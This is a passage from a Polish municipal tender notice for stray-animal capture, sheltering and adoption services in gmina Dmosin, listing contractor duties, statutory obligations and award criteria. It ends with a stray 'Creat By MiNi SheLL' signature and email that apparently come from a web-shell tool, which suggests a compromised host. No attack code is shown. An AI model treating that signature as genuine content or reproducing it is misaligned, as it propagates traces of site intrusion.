4. Prowadzenie działań adopcyjnych zwierząt z terenu gminy Dmosin poprzez poszukiwania chętnych do przyjęcia zwierząt i oddanie do adopcji zwierząt, Wykonawca jest zobowiązany do zapewnienia oddania do adopcji zwierząt odłapanych z terenu gminy Dmosin w ilości wskazanej w złożonej ofercie,
5. bezzwłoczne informowanie Zamawiającego o przekazaniu zwierzęcia do adopcji lub jego zgonie, 
6. sprawowanie całodobowej opieki nad zwierzętami, w zakres której wchodzi także wyżywienie, schronienie, opieka weterynaryjna,
7. zapewnienie pomieszczeń boksów do przetrzymywania zwierząt w odpowiednich warunkach, zgodnie z obowiązującymi przepisami prawa w tym: zabezpieczenie zwierząt przed negatywnym wpływem czynników atmosferycznych,  takich jak: deszcz, śnieg, wiatr, szkodliwe działanie słońca, zapewnienia zwierzętom  odpowiedniego oświetlenia, oddzielenie zwierząt agresywnych od zwierząt nieprzejawiających takiej cechy;
8. sprawowanie opieki weterynaryjnej, polegającej na:
                             a)  15 dniowej kwarantannie,
b) odpchleniu i odrobaczeniu,
c) szczepieniu i leczeniu,
d) badaniach profilaktycznych
f) leczeniu zwierząt w przypadku ich zachorowania, oraz w uzasadnionych przypadkach poddanie zwierząt eutanazji.
9. powiadomienie Zamawiającego o rozpoczęciu i zakończeniu wykonywania zlecenia, 
po otrzymaniu od Zamawiającego zgłoszenia, o którym mowa w ppkt 1.

10. Szczegółowy szacunkowy zakres zlecenia obejmuje następujące zadania jednostkowe:
a)	odłapanie i dostarczenie do schroniska zwierzęcia oraz oznaczenie chipem  5 szt.,
b)	wykonanie czynności opisanych w punkcie 1) w stosunku do kolejnego zwierzęcia odłapanego w tym samym miejscu  2 szt.,
c)	odbiór (usługa nie zawiera odłapania zwierzęcia) jednego zwierzęcia
lub więcej w tym samym miejscu i czasie  ich transport do schroniska i oznaczenie chipem  3 szt.,
d)	utrzymanie zwierzęcia (tj. psów i kotów)  odłapanego w okresie realizacji zamówienia 10 -szt.,
e)	dojazdy w przypadku zgłoszenia przez Zleceniodawcę zwierzęcia, którego zlokalizowanie i odłapanie będzie niemożliwe  5 szt.
11. Zadania jednostkowe, będą realizowane na podstawie zgłoszeń dokonywanych przez uprawnionego pracownika Zamawiającego.
12. Zamawiający dopuszcza zmianę ilości poszczególnych rodzajów zadań jednostkowych, szacunkowo określonych w pkt. 10, z zastrzeżeniem nieprzekraczalności maksymalnego wynagrodzenia, o którym mowa w § 3 ust. 2 wzoru umowy.
13. Wykonawca zobowiązany jest do:
1) Przestrzegania przepisów prawa zawartych w:
a) ustawie z dnia 21 sierpnia 1997r. o ochronie zwierząt (Dz. U. z 2013r. poz. 856 z
późniejszymi zmianami),
b) ustawie z dnia 11 marca 2004r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (Dz. U. z 2014r. poz. 1539 z późniejszymi zmianami),
c) ustawie z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach 
(Dz. U. z 2016r. poz. 250),
d) we właściwych rozporządzeniach wydanych na podstawie ww. ustaw,
2) zachowania bezpieczeństwa, porządku i czystości podczas realizacji przedmiotu umowy,
3) powierzenia wykonywania obowiązków i zadań objętych przedmiotem zamówienia wyłącznie osobom posiadającym wymagane do tego kwalifikacje i uprawnienia 
oraz zaopatrzenia ich w odpowiedni sprzęt zapewniający bezpieczeństwo ludzi                       i zwierząt,
4) zapewnienia we własnym zakresie zaplecza organizacyjnego, personalnego                         i narzędzi koniecznych do wykonywania przedmiotu umowy,
5) Wykonawca oświadcza i zapewnia Zamawiającego, że posiada zezwolenie 
na prowadzenie działalności w zakresie objętym niniejszą umową i koniecznym 
do prowadzenia działalności w sferze ochrony nad bezdomnymi zwierzętami, zgodnie 
z art. 7 ust. 1  ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach oraz zobowiązuje się do posiadania i uaktualniania powyższego zezwolenia przez cały okres realizacji umowy. W przypadku, gdy zezwolenie traci moc obowiązującą, w trakcie trwania niniejszej umowy Wykonawca obowiązany jest do uzyskania aktualnego zezwolenia najpóźniej w dniu poprzedzającym dzień wygaśnięcia dotychczasowych uprawnień.
6) Zamawiający zobowiązany jest do natychmiastowego poinformowania Wykonawcy w przypadku wystąpienia objawów choroby zakaźnej, zwalczanej z urzędu na swoim terenie. Analogiczny obowiązek ciąży na Wykonawcy wobec Zamawiającego.
7) Za wszelkie wypadki i szkody oraz ich następstwa wynikłe w związku z realizacją umowy odpowiada wyłącznie Wykonawca.
8) Za działania lub zaniechania swoich pracowników, współpracowników, podwykonawców uczestniczących w wykonywaniu przedmiotu umowy Wykonawca odpowiada tak, jak za działania lub zaniechania własne.
14.  W ramach realizacji zobowiązania, o którym mowa w ust. 1 pkt 3 Wykonawca zapewnia adopcję co najmniej (  ilości podanej w ofercie) zwierzęcia/zwierząt w każdym kwartale obowiązywania umowy, począwszy od miesiąca, w którym odłapano pierwsze zwierzę z terenu gminy Dmosin. Obowiązek powyższy jest wyłączony w przypadku, gdy w danym miesiącu nie odłapano żadnego zwierzęcia z terenu gminy Dmosin, a w schronisku, do którego Wykonawca przewozi zwierzęta, nie są hotelowane żadne zwierzęta odłapane z terenu gminy Dmosin na podstawie niniejszej umowy. Termin oddania do adopcji zwierzęcia/zwierząt w ilości wskazanej w zdaniu pierwszym upływa z ostatnim dniem każdego miesiąca kalendarzowego, w którym w schronisku znajdują się zwierzęta odłapane z terenu gminy Dmosin.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>98380000-0, 85200000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Ilość przeprowadzonych adopcji bezdomnych zwierzat w okresie każdego kwartału</td><td>30</td></tr><tr><td>czas odłapania zwierzęcia od przykjęcia zgłoszenia</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com